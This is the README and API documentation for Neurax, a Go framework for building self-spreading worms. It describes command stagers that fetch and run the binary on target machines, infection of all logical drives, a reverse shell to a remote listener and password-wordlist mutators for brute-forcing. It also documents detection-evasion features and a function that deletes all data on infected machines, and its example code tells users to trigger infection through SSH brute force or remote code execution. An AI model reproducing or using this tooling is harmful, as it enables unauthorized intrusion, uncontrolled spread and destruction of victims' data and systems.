README
¶
A framework that aids in creation of self-spreading software
Overview
With help of Neurax, Golang binaries can spread on LAN/WAN without using any external servers.
Diverse config options and command stagers allow rapid propagation across various wireless environments.
Example code
package main
import . "github.com/redcode-labs/Neurax"
func main(){
//Specify serving port and stager to use
Nrx.Config.Port = 5555
Nrx.Config.Stager = "wget"
//Start a server that exposes the current binary in the background
go NeuraxServer()
//Copy current binary to all logical drives
NeuraxDisks()
//Create a command stager that should be launched on target machine
//It will download, decode and execute the binary
cmd_stager := NeuraxStager()
/* Now you have to somehow execute the command generated above.
You can use SSH bruteforce, some RCE or whatever else you want ;> */
}
New in v. 2.X (separate sub-project)
- Refactor: abandoned framework-like approach in favour of a ready-to-use binary
- Generic wget stager for all UNIX targets
- Single config file to tweak worm's behaviour on the fly
- Automatic self-removal via
unlinkat(2) - Example LinuxKI CVE exploit to supplement network spreading capabilities
- JSON config file is downloaded and evaluated
- Minimalistic re-write of host harvester
New in v. 2.5
- Optional background execution of the second-stage binary (
N.StagerBg) - Command stager saves and executes in context-local path
- It also removes the downloaded binary right after successful execution
- Removed synchronized command execution mechanism for speed/stability reasons. I will come up with a decent alternative prior to next release.
N.NoInfectCheckto disable checking if host is already infected.- Single-execution policy on target machine, enforced with an exclusive file mutex placed inside
NeuraxServer(). - Added a nested goroutine for serving the binary
- New
httrackstager for Linux - Commented-out common wordlist for detection evasion
- Command stager can wait before removing the binary (
N.StagerRemovalDelay)
New in v. 2.0
- New wordlist mutators + common passwords by country
- Improvised passive scanning
.FastScanoption that makes active scans a bit quicker- Wordlists are created strictly in-memory
NeuraxScan()accepts a callback function instead of channel as an argument.NeuraxScan()scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets- Reverse-DNS lookup for targets that are not in IP format
- Extraction of target candidates from ARP cache
- Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)
- Possibility to specify interface and timeout when using passive network scan.
- Improved command stager (can be optionally executed with elevated privileges / multiple times)
- Few changes of options' names
NeuraxConfig.becameN.(cause it's shorter to type)- Functions for random memory allocation + binary migration
- Possibility to chain multiple stagers (ex.
wget+curl) - Volume and complexity of created wordlist can be easily tuned (with options such as
.WordlistExpand) - Possibility to set time-to-live of created binary
List of config entries
| Name | Description | Default value |
|---|---|---|
| Nrx.Config.Stager | Name of the command stager to use | random, platform-compatible |
| Nrx.Config.StagerSudo | If true, Linux cmd stagers are executed with elevated privilleges | false |
| Nrx.Config.StagerRetry | Number of times to re-execute the command stager | 0 |
| Nrx.Config.StagerRemoveDelay | Sleep instruction is applied before removing the downloaded binary | true |
| Nrx.Config.Port | Port to serve on | 6741 |
| Nrx.Config.Platform | Platform to target | detected automatically |
| Nrx.Config.Path | The path under which binary is saved on the host | . |
| Nrx.Config.FileName | Name under which downloaded binary should be served and then saved | random |
| Nrx.Config.Base64 | Encode the transferred binary in base64 | false |
| Nrx.Config.CommPort | Port that is used by binaries to communicate with each other | 7777 |
| Nrx.Config.CommProto | Protocol for communication between nodes | "udp" |
| Nrx.Config.ReverseListener | Contains "<host>:<port>" of remote reverse shell handler |
not specified |
| Nrx.Config.ReverseProto | Protocol to use for reverse connection | "udp" |
| Nrx.Config.ScanRequiredPort | NeuraxScan() treats host as active only when it has a specific port opened | none |
| Nrx.Config.ScanPassive | NeuraxScan() detects hosts using passive ARP traffic monitoring | false |
| Nrx.Config.ScanPassiveTimeout | NeuraxScan() monitors ARP layer this amount of seconds | 50 seconds |
| Nrx.Config.ScanPassiveIface | Interface to use when scanning passively | default |
| Nrx.Config.ScanActiveTimeout | NeuraxScan() sets this value as timeout for scanned port in each thread | 2 seconds |
| Nrx.Config.ScanPassiveAll | NeuraxScan() captures packets on all found devices | false |
| Nrx.Config.ScanPassiveNoArp | Passive scan doesn't set strict ARP capture filter | false |
| Nrx.Config.ScanFirst | A slice containing IP addresses to scan first | []string{} |
| Nrx.Config.ScanFirstOnly | NeuraxScan() scans only hosts specified within .ScanFirst |
false |
| Nrx.Config.ScanArpCache | NeuraxScan() scans first the hosts found in local ARP cache. Works only with active scan | false |
| Nrx.Config.ScanCidr | NeuraxScan() scans this CIDR | local IP + "\24" |
| Nrx.Config.ScanActiveThreads | Number of threads to use for NeuraxScan() | 10 |
| Nrx.Config.ScanFullRange | NeuraxScan() scans all ports of target host to determine if it is active | from 19 to 300 |
| Nrx.Config.ScanInterval | Time interval to sleep before scanning whole subnet again | "2m" |
| Nrx.Config.ScanHostInterval | Time interval to sleep before scanning next host in active mode | "none" |
| Nrx.Config.ScanGatewayFirst | Gateway is the first host scanned when active scan is used | false |
| Nrx.Config.Verbose | If true, all error messages are printed to STDOUT | false |
| Nrx.Config.Remove | When any errors occur, binary removes itself from the host | false |
| Nrx.Config.PreventReexec | If true, when any command matches with those that were already received before, it is not executed | true |
| Nrx.Config.WordlistExpand | NeuraxWordlist() performs non-standard transformations on input words | false |
| Nrx.Config.WordlistCommon | Prepend 20 most common passwords to wordlist | false |
| Nrx.Config.WordlistCommonNum | Number of common passwords to use | all |
| Nrx.Config.WordlistCommonCountries | A map[string]int that contains country codes and number of passwords to use | map[string]int |
| Nrx.Config.WordlistMutators | Mutators to use when .WordlistExpand is specified |
{"single_upper", "cyryllic", "encapsule"} |
| Nrx.Config.WordlistPermuteNum | Maximum length of permutation generated by NeuraxWordlistPermute() | 2 |
| Nrx.Config.WordlistPermuteSeparator | A separator character to use for permutations | "-" |
| Nrx.Config.WordlistShuffle | Shuffle generated wordlist before returning it | false |
| Nrx.Config.AllocNum | This entry defines how many times NeuraxAlloc() allocates random memory |
5 |
| Nrx.Config.Blacklist | Slice that contains IP addresses that are excluded from any type of scanning | []string{} |
| Nrx.Config.FastHTTP | HTTP request in IsHostInfected() is performed using fasthttp library | false |
| Nrx.Config.Debug | Enable debug messages | false |
| Nrx.Config.NoInfectCheck | Disable checking if host is already infected | true |
Finding new targets
Function NeuraxScan(func(string)) enables detection of active hosts on local network.
It's only argument is a callback function that is called in background for every active host.
Host is treated as active when it has at least 1 open port, is not already infected + fullfils conditions specified within N.
NeuraxScan() runs as infinite loop - it scans whole subnet specified by .Cidr config entry and when every host is scanned, function sleeps for an interval given in .ScanInterval.
Disks infection
Neurax binary doesn't have to copy itself using wireless means.
Function NeuraxDisks() copies current binary (under non-suspicious name) to all logical drives that were found.
Copied binary is not executed, but simply resides in it's destination waiting to be run.
NeuraxDisks() returns an error if list of disks cannot be obtained or copying to any destination was impossible.
Another function, NeuraxZIP(num_files int) err allows to create a randomly named .zip archive containing current binary.
It is saved in current directory, and contains up to num_files random files it.
NeuraxZIPSelf() simply zips the current binary, creating an archive holding the same name.
Reverse connections
An interactive reverse shell can be established with NeuraxReverse().
It will receive commands from hostname specified inside .ReverseListener in a form of "<host>:<port>".
Protocol that is used is defined under .ReverseProto
If NeuraxOpenComm() was started before calling this function, each command will behave as described in above section.
If it was not, commands will be executed locally.
Note: this function should be also runned as goroutine to prevent blocking caused by infinite loop used for receiving.
Cleaning up
Whenever "purge" command is received by a node, it resends this command to all other nodes, removes itself from host and quits.
This behaviour can be also commenced using NeuraxPurge() executed somewhere in the source.
Wordlist creation
If spread vector of your choice is based on some kind of bruteforce, it is good to have a proper wordlist prepared.
Storing words in a text-file on client side isn't really effective, so you can mutate a basic wordlist using NeuraxWordlist(...words) []string.
To permute a set of given words, use NeuraxWordlistPermute(..words) []string
Setting time-to-live
If you want your binary to remove itself after given time, use NeuraxSetTTL() at the beginnig of your code.
This function should be launched as a goroutine.
For example:
go NeuraxSetTTL("2m")
will make the binary run NeuraxPurgeSelf() after 2 minutes from initial execution.
Using multiple stagers at once
If you would like to chain all stagers available for given platform, set .Stager to "chain".
Moving the dropped binary
If you need to copy the binary after initial execution, use NeuraxMigrate(path string).
It will copy the binary under path, remove current binary and execute newly migrated one.
Support this tool
If you like this project and want to see it grow, please consider making a small donation :>
License
This software is under MIT license
Documentation
¶
Index ¶
- Variables
- func Disks() error
- func RussianRoulette() error
- func WordBasicLeet(word string) []string
- func WordCharSwap(word string) []string
- func WordCyrillicReplace(word string) []string
- func WordDuplicate(word string) []string
- func WordEncapsulate(word string) []string
- func WordFullLeet(word string) []string
- func WordRevert(word string) []string
- func WordSingleUpperTransform(word string) []string
- func WordSpecialCharsAppend(word string) []string
- func WordSpecialCharsPrepend(word string) []string
- func ZIPSelf() error
- type Config
- type Nrx
- func (nrx *Nrx) Debug(msg string)
- func (nrx *Nrx) IsHostActive(target string) bool
- func (nrx *Nrx) IsHostInfected(target string) bool
- func (nrx *Nrx) Migrate(path string) error
- func (nrx *Nrx) OpenComm(ctx context.Context)
- func (nrx *Nrx) Purge()
- func (nrx *Nrx) PurgeSelf()
- func (nrx *Nrx) ReportError(message string, e error)
- func (nrx *Nrx) Reverse(ctx context.Context)
- func (nrx *Nrx) Scan(f func(string))
- func (nrx *Nrx) Server(cancel context.CancelFunc)
- func (nrx *Nrx) SetTTL(interval string)
- func (nrx *Nrx) Stager() string
- func (nrx *Nrx) StagerLang(name string) string
- func (nrx *Nrx) Wordlist(words ...string) []string
- func (nrx *Nrx) WordlistPermute(words ...string) []string
Constants ¶
This section is empty.
Variables ¶
var Default = Config{ Stager: "random", StagerSudo: false, StagerBg: false, StagerRetry: 0, StagerRemovalDelay: true, Port: 6741, CommPort: 7777, CommProto: "udp", ScanRequiredPort: 0, LocalIp: cf.GetLocalIp(), Path: ".", FileName: "random", Platform: runtime.GOOS, Cidr: cf.GetLocalIp() + "/24", ScanPassive: false, ScanActive: true, ScanActiveTimeout: 2, ScanPassiveTimeout: 50, ScanPassiveIface: "default", ScanPassiveAll: false, ScanPassiveNoArp: false, ScanFast: false, ScanShaker: false, ScanShakerPorts: []int{21, 80}, ScanFirst: []string{}, ScanArpCache: false, ScanActiveThreads: 10, ScanFullRange: false, ScanGatewayFirst: false, ScanFirstOnly: false, Base64: false, Verbose: false, Remove: false, ScanInterval: "2m", ScanHostInterval: "none", ReverseListener: "none", ReverseProto: "udp", PreventReexec: true, ExfilAddr: "none", WordlistExpand: false, WordlistMutators: []string{"single_upper", "encapsule"}, WordlistPermuteNum: 2, WordlistPermuteSeparator: "-", WordlistShuffle: false, AllocNum: 5, Blacklist: []string{}, FastHTTP: false, Debug: false, NoInfectCheck: true, }
Default is a default configuration for neurax malware
var InfectedHosts []string
var LangExecutors = map[string]string{
"python_os": `import os; os.system("COMMAND")`,
"python_subprocess": `import subprocess; subprocess.call("COMMAND", shell=True)`,
"javascript": `var shl = WScript.CreateObject("WScript.Shell"); shl.Run("COMMAND");`,
"php": `exec("COMMAND")`,
"ruby": "`COMMAND`",
"perl": `system("COMMAND");`,
"lua": `os.execute("COMMAND")`,
"mysql": `\! COMMAND`,
"redis": `eval "os.execute('COMMAND')"`,
}
var ReceivedCommands []string
Functions ¶
func RussianRoulette ¶
func RussianRoulette() error
RussianRoulette deletes all data in the machines
func WordCharSwap ¶
WordCharSwap swaps first and last rune/char in string
func WordCyrillicReplace ¶
WordCyrillicReplace replaces cyrillic chars with ascii chars
func WordDuplicate ¶
WordDuplicate duplicates word in to the slice of letters
func WordEncapsulate ¶
WordEncapsulate encapsulates word in punctuations marks
func WordRevert ¶
WordRevert reverts word to the slice of letters
func WordSingleUpperTransform ¶
WordSingleUpperTransform transforms word to uppercase letter slice
func WordSpecialCharsAppend ¶
WordSpecialCharsAppend appends special chars to the word
func WordSpecialCharsPrepend ¶
WordSpecialCharsPrepend prepends special characters to
Types ¶
type Config ¶
type Config struct {
Stager string
StagerSudo bool
StagerBg bool
StagerRetry int
StagerRemovalDelay bool
Port int
CommPort int
CommProto string
LocalIp string
Path string
FileName string
Platform string
Cidr string
ScanPassive bool
ScanActive bool
ScanActiveTimeout int
ScanPassiveTimeout int
ScanPassiveIface string
ScanPassiveAll bool
ScanPassiveNoArp bool
ScanFast bool
ScanShaker bool
ScanShakerPorts []int
ScanFirst []string
ScanArpCache bool
ScanActiveThreads int
ScanFullRange bool
ScanGatewayFirst bool
ScanFirstOnly bool
Base64 bool
ScanRequiredPort int
Verbose bool
Remove bool
ScanInterval string
ScanHostInterval string
ReverseListener string
ReverseProto string
PreventReexec bool
ExfilAddr string
WordlistExpand bool
WordlistMutators []string
WordlistPermuteNum int
WordlistPermuteSeparator string
WordlistShuffle bool
AllocNum int
Blacklist []string
FastHTTP bool
Debug bool
NoInfectCheck bool
}
Config has all features of neurax malware that can be configured
type Nrx ¶
type Nrx struct {
// contains filtered or unexported fields
}
nrx keeps a self copping and nrx malware capabilities
func (*Nrx) IsHostActive ¶
IsHostActive validates is port active when at least one port is open
func (*Nrx) IsHostInfected ¶
IsHostInfected validates if host is infected with Neurax
func (*Nrx) ReportError ¶
ReportError reports error in verbose way
func (*Nrx) Reverse ¶
Reverse launches a reverse shell. Each received command is passed to handleCommand func
func (*Nrx) Server ¶
func (nrx *Nrx) Server(cancel context.CancelFunc)
Server start server serving binary self as bytes or base64 encoded string
func (*Nrx) StagerLang ¶
StagerLang uses specified language
func (*Nrx) WordlistPermute ¶
WordlistPermute permutes words in to slice
Source Files